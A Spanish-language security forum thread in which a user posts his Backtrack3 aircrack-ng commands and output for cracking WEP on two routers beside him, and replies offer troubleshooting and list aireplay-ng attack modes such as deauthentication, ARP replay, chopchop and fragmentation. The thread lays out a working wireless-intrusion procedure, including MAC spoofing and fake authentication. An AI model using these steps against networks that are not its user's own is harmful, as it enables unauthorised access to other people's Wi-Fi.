No recibo ARP requests ni Data con alfa awus036h WEP

#1
He probado mi nueva tarjeta en dos routers.

Un linksys wrt54gl y un dlink adsl2+

En ninguno de los dos puedo recibir DATA ni ARP Requests, los dos tienen una clave WEP y estan a mi lado. Potencia no le falta.

Estos son los commandos y respuestas usando Backtrack3:

#airmon-ng

Interface Chipset Driver

wlan0 RTL8187 r8187


#airmon-ng stop wlan0

Interface Chipset Driver

wlan0 RTL8187 r8187 (monitor mode disabled)

#ifconfig wlan0 down

#macchanger --mac 00:11:22:33:44:55 wlan0

Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
It's the same MAC!!


#airmon-ng start wlan0

Interface Chipset Driver

wlan0 RTL8187 r8187 (monitor mode enabled)

#airodump-ng wlan0

02:31:11:1C:23:26 88 4 0 0 1 54 WEP WEP crash6


#airodump-ng -c 1 -w wep123 --bssid 02:31:11:1C:23:26 wlan0

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

02:31:11:1C:23:26 100 100 155 0 0 1 54 WEP WEP crash6

BSSID STATION PWR Rate Lost Packets Probes


# aireplay-ng -1 0 -a 02:31:11:1C:23:26 -h 00:11:22:33:44:55 -e dani46 wlan0
21:55:43 Waiting for beacon frame (BSSID: 02:31:11:1C:23:26) on channel 1

21:55:44 Sending Authentication Request (Open System) [ACK]
21:55:44 Authentication successful
21:55:44 Sending Association Request [ACK]
21:55:44 Association successful :) (AID: 1)



#aireplay-ng -3 -b 02:31:11:1C:23:26 -h 00:11:22:33:44:55 wlan0

21:56:16 Waiting for beacon frame (BSSID: 02:31:11:1C:23:26 ) on channel 1
Saving ARP requests in replay_arp-0422-215616.cap
You should also start airodump-ng to capture replies.
Read 2555 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)


Shell principal sin ninguna data>

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

02:31:11:1C:23:26 100 86 1033 0 0 1 54 WEP WEP OPN dani46

BSSID STATION PWR Rate Lost Packets Probes

02:31:11:1C:23:26 00:11:22:33:44:55 -1 1- 0 0 1







Valores ALFA

wlan1 802.11b/g Mode:Monitor Access Point: Not-Associated
Bit Rate=11 Mb/s Tx-Power=16 dBm
Retryn Fragment thrff
Encryption keyff
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0


bt ~ # aireplay-ng -9 wlan1
13:41:41 Trying broadcast probe requests...
13:41:43 No Answer...
13:41:43 Found 2 APs

13:41:43 Trying directed probe requests...
13:41:43 00:03:6F:5C:44C - channel: 11 - 'Tele2'
13:41:46 Ping (min/avg/max): 0.020ms/87.230ms/128.236ms Power: 73.53
13:41:46 30/30: 100%

13:41:46 Injection is working!

13:41:46 00:22:6B:56:45:48 - channel: 6 - 'linksys'
13:41:49 Ping (min/avg/max): 56.103ms/91.099ms/100.193ms Power: 88.47
13:41:49 30/30: 100%
 
#2
Hola, te muevo el post al foro de Seguridad Informática.

Respecto a tu problema, lo primero decirte que no siempre funciona la respuesta ARP.

Sólo estás tú?? O tiene otro cliente?? Porque si tiene conectado otro cliente, puedes hacer un ataque de desautentificación

Saludos ;)
 
#5
betita_elfica dijo:
Eso que dicen por ahi que hay que parchear el driver que significa? cada vez debere parchearlo al ser un live cd?

Solo estoy conectado yo.
Si has de parchear algo, efectivamente te tocará hacerlo cada vez si es un live CD.

Por otro lado lo que haces creo que está bien, pero requiere de práctica, me explico, el procedimiento es:

Lanzar una Auth al AP teniendo el aireplay -3 lanzado previamente
esperar unos segundos
si pasados 4 o 5 segundos no comienza a subir las ARPs se repite el auth
esta vez 2 auths. Parar el aireplay -3 si ves que tampoco nada y volverlo a lanzar... Y a veces estar encima del ap no es lo mejor, a veces conviene estar a un metro o dos.

Suerte.
 
#6
Voy a probar mas , ahora tengo el linksys con tomato, victeck me dijo que el tomato es anti ARP requests xd o sea que no es tan facil como los demas routers.

En remote-exploit me comentaron que utilize -4 o -5 en el aireplay. Voy a probar estoy a unos 6 metros y una pared.
 
#7
betita_elfica dijo:
Voy a probar mas , ahora tengo el linksys con tomato, victeck me dijo que el tomato es anti ARP requests xd o sea que no es tan facil como los demas routers.

En remote-exploit me comentaron que utilize -4 o -5 en el aireplay. Voy a probar estoy a unos 6 metros y una pared.
Efectivamente a algunos AP no les puedes hacer eso, porque no responden nada (los de Cisco, por ejemplo), por lo tanto necesitas tener un cliente conectado y enviando tráfico a la red. Los ataques 4 y 5 no los he usado nunca porque con el 3 me ha funcionado.

Aquí tienes una lista de que significa cada uno:

- 0: Desautentificación
- 1: Asociación Falsa
- 2: Ataque de reinyección
- 3: Reinyección de paquetes ARP
- 4: Ataque chopchop
- 5: Ataque de Fragmentación
- 9: Test de Inyección
 
Arriba